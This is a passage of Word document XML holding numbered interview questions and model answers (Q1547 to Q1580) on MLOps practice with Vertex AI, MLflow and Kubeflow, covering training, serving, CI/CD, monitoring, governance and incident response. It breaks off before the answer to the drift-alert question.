      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design the platform around repeatable pipelines: data validation and feature preparation, custom training or AutoML, evaluation gates, registration in Vertex AI Model Registry, and controlled deployment to endpoints or batch prediction. Wrap it with least-privilege service accounts, Artifact Registry, Cloud Build or GitHub Actions, model monitoring, audit logs, labels, budgets, and quotas so each model has clear lineage, ownership, rollback, and cost attribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1547. Vertex AI custom training: A training job works locally but fails on Vertex AI. How would you debug packaging, container image, service account, data access, and logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with Cloud Logging for the custom job and identify whether the failure is import/package related, container startup, permission, data path, or runtime resource exhaustion. Reproduce the container locally with the same entrypoint, verify all dependencies are included, confirm the Vertex AI service account has access to Cloud Storage/BigQuery/Artifact Registry, check region and URI correctness, and add explicit startup validation so packaging and data-access failures happen early.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1548. Vertex AI endpoint latency: A deployed model endpoint has high p95 latency after traffic increases. How would you troubleshoot autoscaling, machine type, model load time, request payloads, and downstream dependencies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break latency into model inference time, request serialization, network time, cold starts/model loading, and any downstream calls. Check endpoint metrics for replica count, CPU/GPU utilization, queueing, and autoscaling lag; compare machine types and accelerator choices; inspect payload size and preprocessing cost; and load test with realistic concurrency before tuning min replicas, max replicas, batching, model format, or moving heavy preprocessing out of the online path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1549. Vertex AI model registry: How would you use Vertex AI Model Registry to manage versions, aliases, lineage, approvals, rollback, and auditability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Register every approved model version with metadata such as training data reference, code commit, pipeline run, metrics, owner, and approval status. Use aliases or deployment metadata to identify staging/candidate/production versions, gate promotion on evaluation thresholds and review, and keep previous production versions available so rollback means redeploying or retargeting the endpoint to a known-good version with full audit history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1550. Vertex AI batch prediction: When would you choose Vertex AI batch prediction over online endpoints, Dataflow, Cloud Run jobs, or GKE jobs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose Vertex AI batch prediction when you need managed, large-scale offline scoring with no real-time latency requirement and the model is already in Vertex AI. Use online endpoints for synchronous user-facing predictions, Dataflow when prediction is part of a streaming or complex data transform, Cloud Run jobs for simpler containerized batch tasks, and GKE jobs when you need custom scheduling, GPUs, sidecars, or deeper platform control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1551. Vertex AI Feature Store: How would you design feature freshness, offline/online consistency, access control, lineage, and monitoring for a feature store on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define ownership and SLAs for each feature, including freshness, allowed lag, and backfill behavior. Keep offline training features and online serving features generated from the same transformation logic where possible, track lineage back to source tables and pipeline runs, enforce access with IAM and data governance policies, and monitor missing values, distribution changes, stale features, and training-serving skew.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1552. Vertex AI model monitoring: What would you monitor for skew, drift, attribution drift, data quality, prediction quality, and alert fatigue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor input schema validity, missing/null rates, feature distribution drift against the training baseline, training-serving skew, prediction distribution shifts, and business or label-based quality metrics when ground truth arrives. Tune thresholds with minimum sample sizes and persistence windows, route only actionable alerts to on-call, and use dashboards or tickets for lower-severity drift so monitoring improves reliability without creating noisy pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1553. Vertex AI CI/CD: How would you build a CI/CD pipeline that packages training code, compiles pipelines, runs evaluation gates, registers models, and promotes deployments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use CI to lint/test training and pipeline code, build and scan containers, push images to Artifact Registry, and compile the Vertex AI Pipeline spec. The CD path runs the pipeline in a controlled environment, evaluates metrics against thresholds, registers only passing models, and promotes to staging/production through approvals or automated canary checks, with rollback handled by redeploying the previous registry version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1554. Vertex AI security: How would you secure Vertex AI workloads using least-privilege IAM, service accounts, VPC-SC, private networking, CMEK, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Give each pipeline, training job, and endpoint a dedicated least-privilege service account rather than broad project roles, and avoid long-lived keys. Use private networking where supported, restrict data access with VPC Service Controls for sensitive projects, use CMEK when encryption-key ownership is required, keep Artifact Registry and data stores locked down, and rely on Cloud Audit Logs plus labels to trace who trained, registered, and deployed each model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1555. Vertex AI cost optimization: A Vertex AI project has rising training and prediction costs. How would you analyze spend and reduce waste without hurting model quality?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with billing export by project, label, model, endpoint, training job, region, and SKU to identify whether spend is coming from training, online prediction, batch jobs, GPUs, idle replicas, or logging. Reduce waste by right-sizing machines, setting endpoint min replicas appropriately, scheduling non-prod shutdowns, using batch prediction for offline workloads, caching or batching requests, pruning unused models/endpoints, and comparing cheaper model sizes against quality metrics before changing production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1556. MLflow reproducibility: What exactly would you log in MLflow so another engineer can reproduce a model months later?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Log the code version, dataset snapshot or query/version, feature transformation version, parameters, metrics, random seed, library/environment file, training container image, model artifact, evaluation report, and any preprocessing artifacts. The goal is that someone can reconstruct not just the trained model file but the exact training context that produced it, which is essential for debugging, audit, retraining, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1557. MLflow artifact storage: How would you design MLflow tracking server, backend store, artifact store, access control, backup, and retention in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run the MLflow tracking server stateless, store metadata in a managed database such as Cloud SQL/Postgres, and store artifacts in durable object storage such as GCS or S3 rather than local disk. Protect it with SSO or gateway auth, restrict bucket/database access with least privilege, back up the backend store, define retention for old runs/artifacts, and monitor server latency, database health, storage growth, and failed artifact uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1558. MLflow CI/CD integration: How would you integrate MLflow with GitHub Actions, Jenkins, or Cloud Build for automated training, evaluation, registration, and deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Have CI test the training code and build the training/serving image, then run training in a controlled job that logs metrics and artifacts to MLflow with the git SHA attached. A promotion step compares metrics against thresholds, registers a model version only if it passes, and triggers deployment to staging or production through an approval or canary gate, with rollback pointing the serving layer back to the previous registry version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1559. MLflow vs Vertex AI: When would you choose MLflow, Vertex AI Experiments/Model Registry, or use both together in a GCP MLOps platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose MLflow when you want open-source portability, framework-neutral tracking, and a registry that can work across clouds or self-hosted Kubernetes. Choose Vertex AI native tracking and registry when the platform is strongly GCP-managed and you want tight integration with Vertex AI Pipelines, endpoints, monitoring, IAM, and audit logs. Many teams use both: MLflow for experiment tracking and collaboration, then publish approved models into Vertex AI for managed deployment and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1560. MLflow model serving: How would you deploy an MLflow model for real-time inference using Docker, FastAPI, Kubernetes, KServe, or a managed endpoint?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Package the MLflow model with its dependencies and signature, then choose a serving path based on control needs: MLflow's built-in serving for simple tests, a Docker/FastAPI wrapper for custom preprocessing and APIs, KServe/Seldon on Kubernetes for production traffic management, or a managed endpoint for lower operations overhead. Validate input schema, add health checks, observability, canary rollout, and a rollback path to the previous registry version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1561. MLflow governance: How would you enforce model ownership, approval gates, lineage, security scanning, and compliance evidence using MLflow metadata?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use required tags and registry metadata for owner, data source, git commit, pipeline run, risk tier, approval status, and deployment target, then enforce promotion through automation rather than manual UI changes. Store evaluation reports, bias/explainability checks, vulnerability scan evidence, and approval comments as artifacts or registry notes so the model's path from experiment to production is traceable for audit and incident review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1562. Kubeflow components: How would you package pipeline components as containers, pass artifacts/parameters between steps, and keep them reusable across teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Package each component as a small container with a clear command, pinned dependencies, and explicit input/output contracts. Pass lightweight values as parameters and larger files/models/reports as artifacts in shared storage, version component images in Artifact Registry, document expected schemas, and avoid embedding project-specific paths so the same component can be reused across teams and environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1563. Kubeflow distributed training: How would you run distributed TensorFlow or PyTorch training on Kubeflow with GPUs, node pools, retries, and checkpointing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Kubeflow Training Operators such as TFJob or PyTorchJob, schedule workers on GPU node pools with node selectors, taints/tolerations, and resource requests, and store checkpoints in durable storage so failed jobs can resume. Monitor GPU utilization, logs, and job status, set sensible restart policies and backoff limits, and validate that distributed networking, image dependencies, and data access work before scaling to expensive multi-GPU runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1564. Kubeflow Katib: When would you use Katib for hyperparameter tuning, and how would you control search cost, parallel trials, metrics, and early stopping?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Katib when manual tuning is too slow and the model has a clear objective metric such as validation accuracy, F1, or loss. Limit cost by bounding the search space, max trials, parallel trials, GPU requests, and experiment duration; expose metrics from the training job consistently; and use early stopping so weak trials release resources quickly instead of burning GPU time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1565. Kubeflow model serving: How would you serve models from Kubeflow using KServe, canary releases, autoscaling, GPU support, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use KServe InferenceService resources to deploy model servers with explicit model artifact URIs, resource requests, autoscaling settings, and health checks. Roll out new versions with canary traffic splits or separate revisions, monitor latency, error rate, model quality, and GPU utilization, and keep the previous model artifact and serving config available so rollback is a quick traffic shift or manifest revert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1566. Kubeflow CI/CD: How would you integrate Kubeflow Pipelines with GitHub Actions, Jenkins, Cloud Build, ArgoCD, or GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use CI to test component code, build and scan container images, push them to Artifact Registry, and compile/version the pipeline spec. Use CD or GitOps to promote pipeline definitions and serving manifests through environments, trigger pipeline runs with approved parameters, gate promotion on evaluation results, and let ArgoCD manage long-lived Kubernetes resources such as KServe services and platform config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1567. MLOps architecture: How would you design an end-to-end production MLOps platform from data ingestion to monitoring and retraining?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with versioned data ingestion, validation, feature engineering, training, experiment tracking, evaluation, model registry, deployment, monitoring, and retraining. Each stage should capture lineage, code version, data version, artifacts, metrics, owner, and approval status, with CI/CD automation, IaC, least-privilege IAM, observability, rollback, and cost controls wrapped around the whole lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1568. MLOps lifecycle ownership: Where do data scientists, ML engineers, platform engineers, SREs, and security teams own different parts of the model lifecycle?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data scientists usually own experimentation, feature hypotheses, and model quality; ML engineers productionize training, packaging, evaluation, and serving; platform engineers provide reusable pipelines, infrastructure, registries, and deployment patterns; SREs own reliability practices such as SLOs, monitoring, incident response, and rollback; security owns IAM, secrets, supply chain, privacy, and compliance controls. The handoffs must be explicit so production issues do not fall between teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1569. MLOps CI/CD/CT: How would you design continuous integration, continuous delivery, and continuous training for ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI should test code, data contracts, pipeline components, containers, and model-serving APIs. CD should promote versioned artifacts through staging and production with evaluation gates, approvals, canaries, and rollback. CT should retrain from scheduled or trigger-based signals, but promotion still needs validation against baseline/champion metrics so automated retraining cannot silently degrade production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1570. MLOps data validation: What data quality, schema, freshness, and anomaly checks would you add before training or inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Validate schema, required columns, types, ranges, null rates, duplicate records, category drift, feature freshness, volume anomalies, and referential integrity before training or inference. For production, fail fast on hard contract breaks, warn or quarantine suspicious batches, and log validation results as pipeline artifacts so bad data is caught before it creates a bad model or bad predictions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1571. MLOps model evaluation gates: What offline, online, business, fairness, latency, and reliability gates should a model pass before production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Offline gates include accuracy, precision/recall, calibration, regression metrics, robustness, and comparison against the current champion. Online gates include canary or shadow results, latency, error rate, resource usage, and business KPIs. For responsible production use, also check fairness, explainability, data coverage, security, and rollback readiness before allowing promotion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1572. MLOps monitoring strategy: How would you monitor model quality, data drift, concept drift, latency, errors, feature freshness, and business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Combine service metrics such as latency, throughput, error rate, and resource usage with ML-specific signals such as feature distributions, prediction distributions, data drift, training-serving skew, delayed ground-truth quality metrics, and business KPIs. Use thresholds with minimum sample sizes and persistence windows, route severe user-impact issues to paging, and send lower-severity drift to review workflows to avoid alert fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1573. MLOps retraining strategy: How would you decide between scheduled retraining, trigger-based retraining, manual retraining, and champion-challenger updates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use scheduled retraining when the business has predictable data changes, trigger-based retraining when drift or performance degradation is measurable, and manual retraining for high-risk models where human review is required. Champion-challenger works well when a candidate can be evaluated safely against the current model; in all cases, retraining should produce a candidate, not automatically overwrite production without evaluation gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1574. MLOps incident response: A production model starts giving bad predictions but infrastructure metrics look healthy. How would you investigate and mitigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as an ML incident: confirm impact with prediction samples and business metrics, compare current inputs against training baselines, check feature freshness, upstream data pipelines, schema changes, model version, recent deployments, and ground-truth feedback. Mitigate by rolling back to the previous model, disabling risky features, routing to rules/manual review, or reducing traffic while preserving logs and artifacts for root-cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1575. MLOps governance: How would you make models reproducible, auditable, explainable, secure, and compliant across teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every production model to have lineage linking data, code, pipeline run, parameters, metrics, artifacts, approvals, and deployment history. Add model cards or documentation, explainability and fairness checks where relevant, least-privilege access, signed/scanned containers, audit logs, retention policies, and approval workflows so governance is built into the pipeline rather than handled manually after deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1576. MLOps cost and reliability: How would you balance GPU cost, batch vs online serving, autoscaling, SLOs, and rollback for production ML workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Classify workloads by latency and criticality: use batch prediction for offline work, online endpoints only when users need synchronous responses, and GPUs only when CPU or smaller models cannot meet SLOs. Right-size accelerators, use autoscaling and quotas, monitor utilization and cost by model/team, and keep rollback simple through versioned model artifacts and canary deployments so reliability does not require uncontrolled overprovisioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1577. MLOps situation - bad model release: A new model version passed offline tests but hurts business KPIs after deployment. What do you do in the first hour?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First stabilize: pause the rollout, reduce or shift traffic back to the previous model, and confirm the KPI drop is real rather than a dashboard or attribution delay. Then compare canary segments, prediction distributions, feature values, model version, and recent upstream data changes. Preserve evidence, communicate impact and mitigation, and after recovery add stronger online gates, shadow testing, or business-metric canaries so offline metrics are not the only release signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1578. MLOps situation - data pipeline delay: Training data is delayed by six hours and a retraining job is about to run. How do you decide whether to proceed, skip, or use older data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the retraining job requires the delayed data for correctness or whether older validated data is acceptable under the model's freshness SLA. If freshness is critical, skip or hold the run and alert the data owner; if the model is robust to lag, run with the last complete validated snapshot and clearly tag the data version. The key is to avoid silently training on partial data and to make freshness checks part of the pipeline gate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1579. MLOps situation - silent schema change: An upstream team changed a column meaning without changing its name. How would you detect, mitigate, and prevent this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Detect it through distribution checks, feature importance changes, business KPI shifts, training-serving skew checks, and contract tests that validate semantics where possible, not just column names. Mitigate by rolling back or disabling the affected feature, retraining only after data is corrected, and notifying the upstream owner. Prevent it with data contracts, ownership, change review, feature documentation, and alerts on statistical shifts even when schema technically remains valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1580. MLOps situation - feature drift alert: Drift monitoring fires during a holiday sale, but revenue is up. How do you avoid a false incident while still protecting the model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
